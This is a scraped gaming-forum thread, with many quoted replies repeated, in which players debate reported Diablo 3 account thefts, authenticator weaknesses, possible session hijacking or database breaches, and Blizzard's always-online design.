It's all he said she said. Sure a lot of these people could be lying. Sure Blizzard could also be lying. Only time will tell how this all plays out. All this could magically go away. /shrug
I'll take a blue post over random raging out forum nerds any day of the week on this matter.
I highly doubt that Blizzard would lie about this issue. It would be very damaging to their security to mislead the users in this way.
If the problem is on their end, they would need to be upfront about it. If it's not then they need to be as clear as possible so that people are aware of the threats to be avoided.
From a security perspecitve, lying here would do more harm than good.
Not if said hole was closed, they called all the users a bunch of whiney liars and quickly moved on. It'd be just a blip on the MMO radar unlike if they had to come forward and say that there was an exploit that allow peoples stuff to be stolen. The big difference is you trust them to tell the truth and I trust them to do what's best for business.
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
It's all he said she said. Sure a lot of these people could be lying. Sure Blizzard could also be lying. Only time will tell how this all plays out. All this could magically go away. /shrug
I'll take a blue post over random raging out forum nerds any day of the week on this matter.
I highly doubt that Blizzard would lie about this issue. It would be very damaging to their security to mislead the users in this way.
If the problem is on their end, they would need to be upfront about it. If it's not then they need to be as clear as possible so that people are aware of the threats to be avoided.
From a security perspecitve, lying here would do more harm than good.
Not if said hole was closed, they called all the users a bunch of whiney liars and quickly moved on. It'd be just a blip on the MMO radar unlike if they had to come forward and say that there was an exploit that allow peoples stuff to be stolen. The big difference is you trust them to tell the truth and I trust them to do what's best for business.
I'll say this again since you may not have read my previous 30 billion posts on this topic.
I do not deny the possibility of an authentication exploit being present in a game such as this. It wouldn't be the first time.
I do deny the supposed "Session high-jacking" exploit being claimed by many people on the forums.
I have no reason to distrust Blizzards official stance on this subject. If they say hackers are logging in through traditional means, I have not been able to find any evidence to contradict this.
I HAVE however found enough evidence to disprove the "session highjack" exploit that everyone is going on about.
In other words, there very well could be a vulnerability in the game that allows unauthorized authentication. I do not believe that is what is happening here. What Blizzard is saying officially goes right along with the research I have done on the matter. I have no reason to believe anything else until shown some kind of solid proof.
Speculation is fun. But I know the sessionjack is fake.
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
Does this surprise you? For being the best and biggest mmo ever their security is a joke. I have played almost all the big mmos since wow. Vanguard, Lotro,aoc,rift,war,swtor,and tera to name a few and guess what never have i been hacked except on blizzard. Either blizzard just doesnt care and away to get people who havent logged in awhile to get their attention. Or they allow the gold sellers to hack peoples account to keep them happy.
Whatever the reason is that is one reason i will never put my information on any blizzard website.
"Oh noes they hacked ma single player game which I was forced to play online!"
Whatever the source or scope to this, it's pretty painful. Another argument to also offer offline, locally stored single player only characters without AH access but I guess that's detrimental to their business model of taking cuts from transactions and gives pirates a slightly easier time (because there's no need to simulate a server).
Not sure if I am in any way a typical hack & slash player but I think of my hundreds of hours in D2 over the years, I played around 95% solo, 4,99% over LAN with friends and 0,01% over the net with people I didn't know.
I'm glad I left before the claws could be dug into my account however they are doing it. So far, it's all good still, they missed me. Blizzard better find and fix the vulnerability asap. Won't be returning, maybe look at Torchlight 2 or wait for GW2 for the next game fix.. or just back to WoW.
Everyone knows that when accounts get stolen 99.9% of the time it is the users own fault. Everything in that article is speculation.. words like 'suggested' are evidence that the whole article is completely factless. Even the word 'hacked' isn't accurate right now because no one knows why those items went missing.
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kind of vulnerabilities then I'm glad I didn't buy the game for other reaons.
The Theory of Conservative Conservation of Ignorant Stupidity: Having a different opinion must mean you're a troll.
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?Who'd have thought?!
Blizzard going "online only" to prevent hackers is like filling your swimming pool with ocean water to keep sharks out... lol!
Error: 37. Signature not found. Please connect to my server for signature access.
I've added the authenticator to my battle.net account before I even entered the d3 product code on the web.
So whoever still didn't do that or doesn't waste more money on this "keychain authenticator" you can always just download it for your smartphone (which I did as well) and add it to your account.
There's also this "self help" option you can add to your account which enables you to enter your mobile phone number and they contact you if something suspicious happens with your account via SMS. This way you can get your account back with much less hussle with customer support or their webforms. It's simple, you just use your own phone and the SMS they give you. I think that's a neat way to secure your account even in case the authenticator does not stop them from hacking your account.
Oh and, the best part of the SMS service is that it's free!
"Happiness is not a destination. It is a method of life." -------------------------------
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
Who'd have thought?!
Blizzard going "online only" to prevent hackers is like filling your swimming pool with ocean water to keep sharks out... lol!
Atleast they're trying... For every million they make, there's 2 million they lost due to piracy... They had to fight it with something.
But, when it comes to internet, nothing is flawless and hackproof. Hell, pentagons security was taken down more than once and look at the money they spend to prevent that from happening.
There's always some "evil" genious who'll bypass all the security and breach in. Always
"Happiness is not a destination. It is a method of life." -------------------------------
I am not sure if anyone has mentioned this but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator - if it does not have to be used. As much of a pain that it is to use it I would rather Blizzard ask me EVERY time to use my authenticator I log in. I don't understand why Blizzard does not do this.
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't login back instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need of authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again since it probably didn't even notice I was gone from the servers and that allows them to exploit that?
"Happiness is not a destination. It is a method of life." -------------------------------
Originally posted by Gaborik Does this surprise you? For being the best and biggest mmo ever their security is a joke. I have played almost all the big mmos since wow. Vanguard, Lotro,aoc,rift,war,swtor,and tera to name a few and guess what never have i been hacked except on blizzard. Either blizzard just doesnt care and away to get people who havent logged in awhile to get their attention. Or they allow the gold sellers to hack peoples account to keep them happy. Whatever the reason is that is one reason i will never put my information on any blizzard website.
That's your situation. I played WoW, EVE Online, Aion and Rift. Well, more to be honest, but those I played for more then one week. Of those, people "hacked" my Aion account and my Rift account. My WoW account hasn't been compromised yet. You say only your WoW account was hacked. Okay, perhaps you had some malicious software on your PC. It makes sense that people directly go for your WoW account, because it's the most popular one of all the games you listed. You didn't give enough information anyway to make a decent guess, like what you had installed at the time you're hacked, if you got a new rig since then, etc. But to me it sounds kind of like the whole Windows/Mac thing, people with Windows are more likely to get bothered by malicious software, because that OS is used way more then OSX.
If anything, I believe that my information is more secure with Blizzard, then other companies. For one, the have multiple security layers and they're pretty transparant when something is happening. They might not be the quickest, but they keep people updated.
To the OP, thekid1, it's true that you only need to input the security code once every week. However, if someone tries to login from another location, they need to input the security token. Normally these codes can be obtained through various methods (the "man-in-the-middle"-method), but with games it's a bit more tricky. They can't just redirect you to a vague login screen in the way that happens with online banking for example. It's actually pretty hard to obtain a securitycode from the Blizzard Authenticator. For that reason I believe Blizzard when they say that there is no evidence yet of people being "hacked" when they make use of the authenticator.
A bit offtopic, but to the rainbow pony robocop man, please, if you don't know what you're talking about, don't say anything at all. I know you hate the always online bit and that you try to sound knowledgable, but you only make yourself look stupid.
I mean: "Expect a rollercoaster month as people begin to get brute force hacked more and more."
...
Brute force hacked...really? You suggested in another topic that a few people, including me, should look up some wiki's about "how to hack servers". My suggestion to you is look up some websites about Information Security, Authentication and Encryption and educate yourself a bit. Please, for my sanity, just do it.
If people's account get compromised, then dubyahite nailed it. People are lazy and don't remember difficult password easily, hence they tend to reuse them a lot. That site that got hacked probably has some people, that use the same accounts/passwords for that site as for battle.net. Chances are that they got more information though, who knows what that site registered. But examples like that is how people's accounts get compromised, without them having any malicious software on their own systems.
I have a hard time imaging some lonely hacker, perhaps a small group, pooling up their hardware resources and botnet's, to brute force some accounts. The thought is just hilarious.
I am not sure if anyone has mentioned this but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator - if it does not have to be used. As much of a pain that it is to use it I would rather Blizzard ask me EVERY time to use my authenticator I log in. I don't understand why Blizzard does not do this.
Double post perhaps, but you can do this. It's in your Battle.net account -> options for the authenticator and there you need to check the box that says "Ask for authentication every time you log in" or something like that.
Everyone knows that when accounts get stolen 99.9% of the time it is the users own fault. Everything in that article is speculation.. words like 'suggested' are evidence that the whole article is completely factless. Even the word 'hacked' isn't accurate right now because no one knows why those items went missing.
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kind of vulnerabilities then I'm glad I didn't buy the game for other reaons.
Aha! Now there's an interesting idea.
I highly doubt that Blizzards username databases are vulnerable to SQL injection, however. Blizzard has a huge target on their back, and if it was that simple they would have huge problems. There is no way Blizzard of all people can't protect against simple SQL injection.
But let's run with that thought. Let's say for argument that somehow through some means a hacker got ahold of the database. It's totally plausible. Heck it could be a low-tech hack from an employee or something.
Now, no database in the world is totally immune to compromise. So we're not even looking at something Blizzard specific here, but just general flaws in database technology and/or corrupt people with access to the database.
So he's got to brute force those passwords.
Guess who's passwords aren't going to succumb to a dictionary attack? Anyone with a decently complex password.
If your password is dictionary based, they've got it. If it's not they don't.
So assuming we know that any (and I do mean any) this places great importance on the user to come up with unique complex passwords that are not susceptible to brute force or dictionary attacks. This is one security principle that has been preached over and over and over again. This part is your responsibility.
Now, I don't mean to place blame on the user here. It is obviously the companies responsibility to protect their database no matter what. Thing is, no data is truly safe.
I sleep better at night knowing that when a database is stolen, the odds of the crackers getting at my password are so small that it's never going to happen. They are going to get about 1/4 of the passwords, which is plenty.
Besides that, there are laws in place that require a company to notify it's users in some fashion if any database containing personal information is compromised. As mmo gamers we should all be familiar with companies doing this (SOE for example). You can be sure that if Blizzard's database has been compromised, we will know about it.
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
"The King and the Pawn return to the same box at the end of the game"
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't login back instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need of authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again since it probably didn't even notice I was gone from the servers and that allows them to exploit that?
This is an interesting point.
If this is the case, hackers may have found a way to Deauth other users from Diablo. This would give them that window to log in without needing an authenticator.
Deauth attacks are a possibility.
Or it might be something as simple as a denial of service attack on the users IP. This actually seems more likely since people are reporting that they have lost connection and/or had slow webpage loading before they lost all of their stuff in some instances. I doubt they have some exploit to deauth you from within the game, but it's possible.
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
Most of the time it's the persons fault because he's being careless... Not adding authenticator, going to fishy websites and stuff like that...
But, it's all over the D3 official forums, people are indeed getting hacked xD Thank god I had no problems for now.
"Happiness is not a destination. It is a method of life." -------------------------------
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Betaguy doesn't mean the client, but more like the author. Client can't be wrong, would be Blizzard then
"Oh noes they hacked ma single player game which I was forced to play online!"
Whatever the source or scope to this, it's pretty painful. Another argument to also offer offline, locally stored single player only characters without AH access but I guess that's detrimental to their business model of taking cuts from transactions and gives pirates a slightly easier time (because there's no need to simulate a server).
Not sure if I am in any way a typical hack & slash player but I think of my hundreds of hours in D2 over the years, I played around 95% solo, 4,99% over LAN with friends and 0,01% over the net with people I didn't know.
I don't know if I agree that it is a good argument for offline play. MMO's are susceptible to the same attacks and I don't think anyone would argue that they should support offline play (what's the point).
I'm not saying D3 is an MMO, and I agree that if there was offline play some people would not be affected, but it doesn't solve the problem. More and more games are going to be faced with issues like this (and already have been in the mmo world for years).
For those of you that would prefer to play offline only or for the vast majority of your time, then yes you wouldn't have to worry about something like this.
However, this is just one game of many. If it wasn't D3 right now it would just be another online game somewhere else. I have no doubt that there are people playing D3 right now, that would have been playing offline, who were also affected by the hack.
I sympathize with those people, I really do.
However, I don't think you make a design decision like online only based on security, and that is coming from a very security minded individual. They have to make the games they want the way they want to. If the market will support their game (which it obviously is in this case) then they have nothing to be sorry about in that sense.
If Diablo 3 were an MMO (a terrible one I'm sure) we would have the same thing going on but noone would be questioning if it should have offline play or not.
FPS games have evolved over the years. We now have FPS games that are strictly online. Global Agenda, Tribes Ascend, Blacklight Retribution to name a few off the top of my head. I'm sure there are better examples, but ot all FPS games have an offline mode even though they used to, just like not all Hack & Slash games have the online only requirement.
Those FPS games were designed with a specific purpose in mind. Online only play, and that's fine. If you don't like that type of thing then you don't have to buy it, which you obviously know.
The fact is that making this one game have an offline only mode doesn't solve the problem. It doesn't even solve the problem for this one specific game as many people would still choose to play online. D3 would still face the same issue it is currently facing.
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Betaguy doesn't mean the client, but more like the author. Client can't be wrong, would be Blizzard then
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
Who'd have thought?!
Blizzard going "online only" to prevent hackers is like filling your swimming pool with ocean water to keep sharks out... lol!
Atleast they're trying... For every million they make, there's 2 million they lost due to piracy... They had to fight it with something.
But, when it comes to internet, nothing is flawless and hackproof. Hell, pentagons security was taken down more than once and look at the money they spend to prevent that from happening.
There's always some "evil" genious who'll bypass all the security and breach in. Always
No, they are NOT trying. That is my point. Making the game offline only would prevent hacks, not the other way.
They know what they are doing though. After a few thousand people get their real life bank accounts robbed through the RMT AH/paypal un-dynamic duo, there will be a massive outcry, which Blizzard will answer by announcing a new "super-authenticator" which will probably log you into the game automatically, and will definitely cost way more than it should.
Error: 37. Signature not found. Please connect to my server for signature access.
Comments
Not if said hole was closed, they called all the users a bunch of whiney liars and quickly moved on. It'd be just a blip on the MMO radar unlike if they had to come forward and say that there was an exploit that allow peoples stuff to be stolen. The big difference is you trust them to tell the truth and I trust them to do what's best for business.
Oh hey, yet another reason an optional single player offline mode would have been a good fucking idea. Sadly, this will do absolutely nothing to stifle the ignorant Blizzard defenders that obviously know anything and everything there is to know about Battle.net's security and how flawless the system as a whole is. Right?
Who'd have thought?!
I'll say this again since you may not have read my previous 30 billion posts on this topic.
I do not deny the possibility of an authentication exploit being present in a game such as this. It wouldn't be the first time.
I do deny the supposed "Session high-jacking" exploit being claimed by many people on the forums.
I have no reason to distrust Blizzards official stance on this subject. If they say hackers are logging in through traditional means, I have not been able to find any evidence to contradict this.
I HAVE however found enough evidence to disprove the "session highjack" exploit that everyone is going on about.
In other words, there very well could be a vulnerability in the game that allows unauthorized authentication. I do not believe that is what is happening here. What Blizzard is saying officially goes right along with the research I have done on the matter. I have no reason to believe anything else until shown some kind of solid proof.
Speculation is fun. But I know the sessionjack is fake.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
I don't buy the session jack theory either. It just doesn't make technical sense. I do believe there is mounting evidence that there is some sort of authentication expoit or bug. Sort of like what happened with Trion. The logic was accounted for and built into the server process. It just didn't work as advertised. Anything is possible with mechanisms as complex as this is. I will just continue to sit back with my popcorn.
It's possible, but I don't think it's happening.
I seriously think that the reports of hacks on the forums are being heavily inflated. I do believe that this is a standard run of the mill bunch of account hacks.
People on forums lie. They troll. They rage. They spam.
I don't see a bunch of posts on the forums about supposedly having an authenticator as being any kind of source of evidence. People will lie about anything to try to get who knows what.
I will take one blue post on those forums over 1,000 poorly written rage posts any day of the week.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Whatever the reason is that is one reason i will never put my information on any blizzard website.
"Oh noes they hacked ma single player game which I was forced to play online!"
Whatever the source or scope to this, it's pretty painful. Another argument to also offer offline, locally stored single player only characters without AH access but I guess that's detrimental to their business model of taking cuts from transactions and gives pirates a slightly easier time (because there's no need to simulate a server).
Not sure if I am in any way a typical hack & slash player but I think of my hundreds of hours in D2 over the years, I played around 95% solo, 4,99% over LAN with friends and 0,01% over the net with people I didn't know.
My brand new bloggity blog.
I'm glad I left before the claws could be dug into my account however they are doing it. So far, it's all good still, they missed me. Blizzard better find and fix the vulnerability asap. Won't be returning, maybe look at Torchlight 2 or wait for GW2 for the next game fix.. or just back to WoW.
I'm sorry, but did you even read that article? It could have been an SQL injection attack to compromise the account information database to easily gain access.
Additionally, if Diablo 3's servers have THOSE easily abused kind of vulnerabilities then I'm glad I didn't buy the game for other reaons.
The Theory of Conservative Conservation of Ignorant Stupidity:
Having a different opinion must mean you're a troll.
Blizzard going "online only" to prevent hackers is like filling your swimming pool with ocean water to keep sharks out... lol!Error: 37. Signature not found. Please connect to my server for signature access.
I've added the authenticator to my battle.net account before I even entered the d3 product code on the web.
So whoever still didn't do that or doesn't waste more money on this "keychain authenticator" you can always just download it for your smartphone (which I did as well) and add it to your account.
There's also this "self help" option you can add to your account which enables you to enter your mobile phone number and they contact you if something suspicious happens with your account via SMS. This way you can get your account back with much less hussle with customer support or their webforms. It's simple, you just use your own phone and the SMS they give you. I think that's a neat way to secure your account even in case the authenticator does not stop them from hacking your account.
Oh and, the best part of the SMS service is that it's free!
"Happiness is not a destination. It is a method of life."
-------------------------------
Atleast they're trying... For every million they make, there's 2 million they lost due to piracy... They had to fight it with something.
But, when it comes to internet, nothing is flawless and hackproof. Hell, pentagons security was taken down more than once and look at the money they spend to prevent that from happening.
There's always some "evil" genious who'll bypass all the security and breach in. Always
"Happiness is not a destination. It is a method of life."
-------------------------------
I am not sure if anyone has mentioned this but the authenticator is not verified every time you log in to D3. As a matter of fact, I have not been asked to use my authenticator in the last 6 times that I have logged in. I can see where accounts might be hacked even if they have an authenticator - if it does not have to be used. As much of a pain that it is to use it I would rather Blizzard ask me EVERY time to use my authenticator I log in. I don't understand why Blizzard does not do this.
The only thing I see as "possible" with this session theory is the following.
When I'm kicked out of the server I sometimes can't login back instantly because my "character isn't out of the game yet". But when this doesn't happen I can pop back into the game without any need of authenticator! Probably the account remembers it was entered before and doesn't require me to enter it again since it probably didn't even notice I was gone from the servers and that allows them to exploit that?
"Happiness is not a destination. It is a method of life."
-------------------------------
That's your situation. I played WoW, EVE Online, Aion and Rift. Well, more to be honest, but those I played for more then one week. Of those, people "hacked" my Aion account and my Rift account. My WoW account hasn't been compromised yet. You say only your WoW account was hacked. Okay, perhaps you had some malicious software on your PC. It makes sense that people directly go for your WoW account, because it's the most popular one of all the games you listed. You didn't give enough information anyway to make a decent guess, like what you had installed at the time you're hacked, if you got a new rig since then, etc. But to me it sounds kind of like the whole Windows/Mac thing, people with Windows are more likely to get bothered by malicious software, because that OS is used way more then OSX.
If anything, I believe that my information is more secure with Blizzard, then other companies. For one, the have multiple security layers and they're pretty transparant when something is happening. They might not be the quickest, but they keep people updated.
To the OP, thekid1, it's true that you only need to input the security code once every week. However, if someone tries to login from another location, they need to input the security token. Normally these codes can be obtained through various methods (the "man-in-the-middle"-method), but with games it's a bit more tricky. They can't just redirect you to a vague login screen in the way that happens with online banking for example. It's actually pretty hard to obtain a securitycode from the Blizzard Authenticator. For that reason I believe Blizzard when they say that there is no evidence yet of people being "hacked" when they make use of the authenticator.
A bit offtopic, but to the rainbow pony robocop man, please, if you don't know what you're talking about, don't say anything at all. I know you hate the always online bit and that you try to sound knowledgable, but you only make yourself look stupid.
I mean: "Expect a rollercoaster month as people begin to get brute force hacked more and more."
...
Brute force hacked...really? You suggested in another topic that a few people, including me, should look up some wiki's about "how to hack servers". My suggestion to you is look up some websites about Information Security, Authentication and Encryption and educate yourself a bit. Please, for my sanity, just do it.
If people's account get compromised, then dubyahite nailed it. People are lazy and don't remember difficult password easily, hence they tend to reuse them a lot. That site that got hacked probably has some people, that use the same accounts/passwords for that site as for battle.net. Chances are that they got more information though, who knows what that site registered. But examples like that is how people's accounts get compromised, without them having any malicious software on their own systems.
I have a hard time imaging some lonely hacker, perhaps a small group, pooling up their hardware resources and botnet's, to brute force some accounts. The thought is just hilarious.
Double post perhaps, but you can do this. It's in your Battle.net account -> options for the authenticator and there you need to check the box that says "Ask for authentication every time you log in" or something like that.
Aha! Now there's an interesting idea.
I highly doubt that Blizzards username databases are vulnerable to SQL injection, however. Blizzard has a huge target on their back, and if it was that simple they would have huge problems. There is no way Blizzard of all people can't protect against simple SQL injection.
But let's run with that thought. Let's say for argument that somehow through some means a hacker got ahold of the database. It's totally plausible. Heck it could be a low-tech hack from an employee or something.
Now, no database in the world is totally immune to compromise. So we're not even looking at something Blizzard specific here, but just general flaws in database technology and/or corrupt people with access to the database.
So he's got to brute force those passwords.
Guess who's passwords aren't going to succumb to a dictionary attack? Anyone with a decently complex password.
If your password is dictionary based, they've got it. If it's not they don't.
So assuming we know that any (and I do mean any) this places great importance on the user to come up with unique complex passwords that are not susceptible to brute force or dictionary attacks. This is one security principle that has been preached over and over and over again. This part is your responsibility.
Now, I don't mean to place blame on the user here. It is obviously the companies responsibility to protect their database no matter what. Thing is, no data is truly safe.
I sleep better at night knowing that when a database is stolen, the odds of the crackers getting at my password are so small that it's never going to happen. They are going to get about 1/4 of the passwords, which is plenty.
Besides that, there are laws in place that require a company to notify it's users in some fashion if any database containing personal information is compromised. As mmo gamers we should all be familiar with companies doing this (SOE for example). You can be sure that if Blizzard's database has been compromised, we will know about it.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Client's fault. a hacker or group of hackers would not just hack this one dudes account... It's a lot of work they would had hacked a whole series... just saying the guy in question is not credible.
This is an interesting point.
If this is the case, hackers may have found a way to Deauth other users from Diablo. This would give them that window to log in without needing an authenticator.
Deauth attacks are a possibility.
Or it might be something as simple as a denial of service attack on the users IP. This actually seems more likely since people are reporting that they have lost connection and/or had slow webpage loading before they lost all of their stuff in some instances. I doubt they have some exploit to deauth you from within the game, but it's possible.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Most of the time it's the persons fault because he's being careless... Not adding authenticator, going to fishy websites and stuff like that...
But, it's all over the D3 official forums, people are indeed getting hacked xD Thank god I had no problems for now.
"Happiness is not a destination. It is a method of life."
-------------------------------
That doesn't mean it's the client's fault. This is the very definition of correlation without causation.
It doesn't have to be the client's fault to be a bulk attack like you described. This thread is filled with other examples of attacks that could have caused this on a large scale.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Betaguy doesn't mean the client, but more like the author. Client can't be wrong, would be Blizzard then
I don't know if I agree that it is a good argument for offline play. MMO's are susceptible to the same attacks and I don't think anyone would argue that they should support offline play (what's the point).
I'm not saying D3 is an MMO, and I agree that if there was offline play some people would not be affected, but it doesn't solve the problem. More and more games are going to be faced with issues like this (and already have been in the mmo world for years).
For those of you that would prefer to play offline only or for the vast majority of your time, then yes you wouldn't have to worry about something like this.
However, this is just one game of many. If it wasn't D3 right now it would just be another online game somewhere else. I have no doubt that there are people playing D3 right now, that would have been playing offline, who were also affected by the hack.
I sympathize with those people, I really do.
However, I don't think you make a design decision like online only based on security, and that is coming from a very security minded individual. They have to make the games they want the way they want to. If the market will support their game (which it obviously is in this case) then they have nothing to be sorry about in that sense.
If Diablo 3 were an MMO (a terrible one I'm sure) we would have the same thing going on but noone would be questioning if it should have offline play or not.
FPS games have evolved over the years. We now have FPS games that are strictly online. Global Agenda, Tribes Ascend, Blacklight Retribution to name a few off the top of my head. I'm sure there are better examples, but ot all FPS games have an offline mode even though they used to, just like not all Hack & Slash games have the online only requirement.
Those FPS games were designed with a specific purpose in mind. Online only play, and that's fine. If you don't like that type of thing then you don't have to buy it, which you obviously know.
The fact is that making this one game have an offline only mode doesn't solve the problem. It doesn't even solve the problem for this one specific game as many people would still choose to play online. D3 would still face the same issue it is currently facing.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
Confused.
anyways sorry bout that my mistake.
Shadow's Hand Guild
Open recruitment for
The Secret World - Dragons
Planetside 2 - Terran Republic
Tera - Dragonfall Server
http://www.shadowshand.com
No, they are NOT trying. That is my point. Making the game offline only would prevent hacks, not the other way.
They know what they are doing though. After a few thousand people get their real life bank accounts robbed through the RMT AH/paypal un-dynamic duo, there will be a massive outcry, which Blizzard will answer by announcing a new "super-authenticator" which will probably log you into the game automatically, and will definitely cost way more than it should.
Error: 37. Signature not found. Please connect to my server for signature access.